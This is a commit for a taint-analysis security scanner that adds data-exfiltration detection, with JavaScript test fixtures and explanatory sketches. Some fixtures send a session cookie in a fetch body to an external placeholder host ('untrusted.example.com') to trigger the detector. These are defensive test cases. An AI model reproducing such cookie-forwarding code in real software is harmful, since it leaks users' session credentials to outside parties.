Added Cap::DATA_EXFIL and taint fp and fn fixes on real repos (#59)

* feat: Enhance data exfiltration detection with source sensitivity gating for cookies and headers

* feat: Implement cross-file data exfiltration detection with parameter-specific gate filters

* feat: Add calibration tests and refine DATA_EXFIL severity scoring logic

* feat: Introduce per-detector configuration for data exfiltration suppression

* feat: Enhance DATA_EXFIL findings with destination field tracking in diagnostics and SARIF output

* feat: Add tainted body and URL handling for data exfiltration detection

* feat: Add integration tests and fixtures for DATA_EXFIL and SSRF detection in Go

* feat: Add Java integration tests and fixtures for DATA_EXFIL detection across multiple HTTP clients

* feat: Add synthetic externals handling for closure-captured variables in SSA

* feat: Implement closure-based suppression for resource leak findings

* feat: Add regression guards for shell-injection and taint propagation in for-of destructure patterns

* feat: Implement constructor cap narrowing for data exfiltration detection in HTTP request builders

* feat: Add gated sinks for data exfiltration detection in C and C++ using curl_easy_setopt

* feat: Implement DATA_EXFIL cap parity for backwards analysis and add integration tests

* feat: Add data exfiltration sinks for various languages and enhance documentation

* refactor: Simplify formatting and improve readability in various files

* refactor: Improve readability by simplifying conditional statements and adding clippy linting

* docs: Update CHANGELOG and comments for data exfiltration features and configuration

* docs: Clarify configuration instructions for data exfiltration trusted destinations

* docs: Enhance comments for evidence routing logic in data exfiltration
Eli Peter 2026-05-01 10:59:52 -04:00 committed by GitHub
parent a438886217
commit 58f1794a4e
GPG key ID: B5690EEEBB952194
189 changed files with 8421 additions and 383 deletions

@ -1,11 +1,15 @@
-// DATA_EXFIL fixture: a fixed destination URL and an attacker-influenced
-// body. SSRF must NOT fire (destination is hardcoded) but `Cap::DATA_EXFIL`
-// must fire on the body field — request-bound bytes are leaving the process
-// via the outbound request payload.
+// DATA_EXFIL fixture: a fixed destination URL and a sensitive (cookie /
+// session) source flowing into the outbound body. SSRF must NOT fire
+// (destination is hardcoded) but `Cap::DATA_EXFIL` must fire because the
+// source is Sensitive (`req.cookies.session` carries auth material) — exactly
+// the cross-boundary leak the cap targets.
+//
+// Plain user input echoed back into a body is intentionally not classified
+// as data exfiltration, see `fetch_body_user_input_silenced.js`.
 //
 // Driven by `fetch_data_exfil_integration_tests.rs`.
 function leakBody(req) {
-  var payload = req.body.message;
+  var payload = req.cookies.session;
   fetch('/endpoint', {
     method: 'POST',
     body: payload,

@ -0,0 +1,19 @@
// DATA_EXFIL type-suppression fixture: a Sensitive cookie source coerced
// to an integer via `parseInt(...)` is NOT a credential payload; the
// resulting numeric body cannot encode a session token, header secret, or
// other exfiltratable material. The type-aware sink suppression in
// `is_type_safe_for_sink` (see `src/ssa/type_facts.rs`) recognises the
// proven-`Int` SSA value at the gate and silences the cap.
//
// Negative regression: without DATA_EXFIL in the type-suppressible mask
// this would over-fire on every `fetch({ body: parseInt(req.cookies.x) })`
// pattern (e.g. analytics ingestion of session counters).
//
// Driven by `fetch_data_exfil_integration_tests.rs`.
function reportSessionCount(req) {
  var count = parseInt(req.cookies.session_count, 10);
  fetch('/metrics', {
    method: 'POST',
    body: count,
  });
}
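
The type-aware suppression described in this fixture can be illustrated with a small toy model. This is only a sketch: the real check is the Rust function `is_type_safe_for_sink`, and the names `TYPE_SUPPRESSIBLE_CAPS` and `isSuppressedByType`, as well as the string type tags, are hypothetical stand-ins invented here for illustration.

```javascript
// Toy model of a type-aware sink gate. All names below are hypothetical and
// do not mirror the actual Rust implementation in `src/ssa/type_facts.rs`.
const TYPE_SUPPRESSIBLE_CAPS = new Set(['DATA_EXFIL']);

// A cap is silenced at the sink only when it is in the type-suppressible
// mask AND the value reaching the sink is proven to be an integer.
function isSuppressedByType(cap, provenType) {
  return TYPE_SUPPRESSIBLE_CAPS.has(cap) && provenType === 'Int';
}

// parseInt returns a number (or NaN), so trailing string content is dropped.
const coerced = parseInt('42; token=abc', 10);

console.log(typeof coerced, coerced);
console.log(isSuppressedByType('DATA_EXFIL', 'Int'));
console.log(isSuppressedByType('DATA_EXFIL', 'String'));
```

In this model, removing `'DATA_EXFIL'` from the set reproduces the over-firing behaviour that the fixture's comment describes as the negative regression.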

@ -0,0 +1,15 @@
// DATA_EXFIL silenced regression fixture: plain user input echoed into the
// body of an outbound `fetch` to a fixed URL must NOT fire `Cap::DATA_EXFIL`.
// The user already controls `req.body.message` — surfacing it back into the
// request payload is not a cross-boundary disclosure. This is the canonical
// false-positive class for API gateways and telemetry forwarders that proxy
// `req.body`, killed by the source-sensitivity gate in `ast.rs`.
//
// Driven by `fetch_data_exfil_integration_tests.rs`.
function forward(req) {
  var payload = req.body.message;
  fetch('/endpoint', {
    method: 'POST',
    body: payload,
  });
}
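
The source-sensitivity gate that separates this fixture from the cookie-based one can be sketched roughly as follows. This is a simplified illustration, not the logic in `ast.rs`: the function names `classifySource` and `dataExfilFires`, the `'Plain'` label, and the use of dotted path strings are all assumptions made for the example. The only grounded part is that cookie and header reads count as Sensitive while plain `req.body` input does not.

```javascript
// Hypothetical classifier: cookie and header reads are treated as Sensitive,
// every other source path as Plain. The real gate works on the AST, not on
// path strings.
function classifySource(path) {
  return /^req\.(cookies|headers)\b/.test(path) ? 'Sensitive' : 'Plain';
}

// In this sketch DATA_EXFIL fires only when the source is Sensitive.
function dataExfilFires(sourcePath) {
  return classifySource(sourcePath) === 'Sensitive';
}

console.log(dataExfilFires('req.cookies.session')); // cookie source
console.log(dataExfilFires('req.body.message'));    // plain user input
```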

@ -0,0 +1,17 @@
// DATA_EXFIL allowlist-suppression fixture.
//
// The destination URL has a static prefix (`https://api.internal/...`) that
// the test harness installs as a trusted destination via
// [detectors.data_exfil.trusted_destinations]. The body still carries a
// Sensitive source (`req.cookies.session`), but routing it through a known-
// trusted upstream is a *legitimate* forwarding pipeline: the cap is
// suppressed for this filter only.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function leakBody(req) {
  var payload = req.cookies.session;
  fetch('https://api.internal/forward', {
    method: 'POST',
    body: payload,
  });
}

@ -0,0 +1,15 @@
// DATA_EXFIL allowlist-NEGATIVE fixture.
//
// The destination URL prefix (`https://untrusted.example.com/`) is NOT
// covered by the harness-installed
// [detectors.data_exfil.trusted_destinations] entries, so the cap MUST
// still fire on a Sensitive source flowing into the body.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function leakBodyExternal(req) {
  var payload = req.cookies.session;
  fetch('https://untrusted.example.com/intake', {
    method: 'POST',
    body: payload,
  });
}
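
Taken together, the allowlist fixture and its negative counterpart describe a static-prefix check on the destination URL. A minimal sketch of that idea is shown below. It assumes the trusted destinations are plain string prefixes and that the harness installs `https://api.internal/`. Both are assumptions, and `isTrustedDestination` is a hypothetical helper rather than a function from the codebase.

```javascript
// Assumed harness configuration: one trusted prefix. The actual entries under
// [detectors.data_exfil.trusted_destinations] are not shown in this diff.
const trustedDestinations = ['https://api.internal/'];

// Hypothetical helper: a destination is trusted when its static URL prefix
// starts with any configured entry.
function isTrustedDestination(url, prefixes) {
  return prefixes.some((prefix) => url.startsWith(prefix));
}

console.log(isTrustedDestination('https://api.internal/forward', trustedDestinations));
console.log(isTrustedDestination('https://untrusted.example.com/intake', trustedDestinations));
```

Under this model the first call corresponds to the suppressed fixture and the second to the fixture where the cap must still fire.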

@ -0,0 +1,13 @@
// DATA_EXFIL sanitizer-convention fixture.
//
// `logEvent({user: req.cookies.session})` routes a Sensitive cookie source
// through a named telemetry boundary. The forwarding-wrapper convention
// (see docs/detectors/taint.md) treats `logEvent` as a default
// `Sanitizer(Cap::DATA_EXFIL)` so the cap does NOT fire on this call.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function track(req) {
  logEvent({
    user: req.cookies.session,
  });
}
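
The forwarding-wrapper convention from this fixture can be pictured as a named call that clears one capability from the taint passing through it. The sketch below is a toy model under that assumption. `FORWARDING_WRAPPERS`, `capsAfterCall`, and the `'OTHER_CAP'` label are hypothetical, and the analyzer's actual sanitizer representation may differ.

```javascript
// Hypothetical default set of forwarding wrappers. Only `logEvent` is named
// in the fixture; the real default list is not shown in this diff.
const FORWARDING_WRAPPERS = new Set(['logEvent']);

// Returns the caps still attached to a value after it flows through `callee`.
// A forwarding wrapper acts like a sanitizer for DATA_EXFIL only.
function capsAfterCall(callee, caps) {
  const remaining = new Set(caps);
  if (FORWARDING_WRAPPERS.has(callee)) {
    remaining.delete('DATA_EXFIL');
  }
  return remaining;
}

const viaLogEvent = capsAfterCall('logEvent', ['DATA_EXFIL', 'OTHER_CAP']);
const viaFetch = capsAfterCall('fetch', ['DATA_EXFIL', 'OTHER_CAP']);

console.log([...viaLogEvent]);
console.log([...viaFetch]);
```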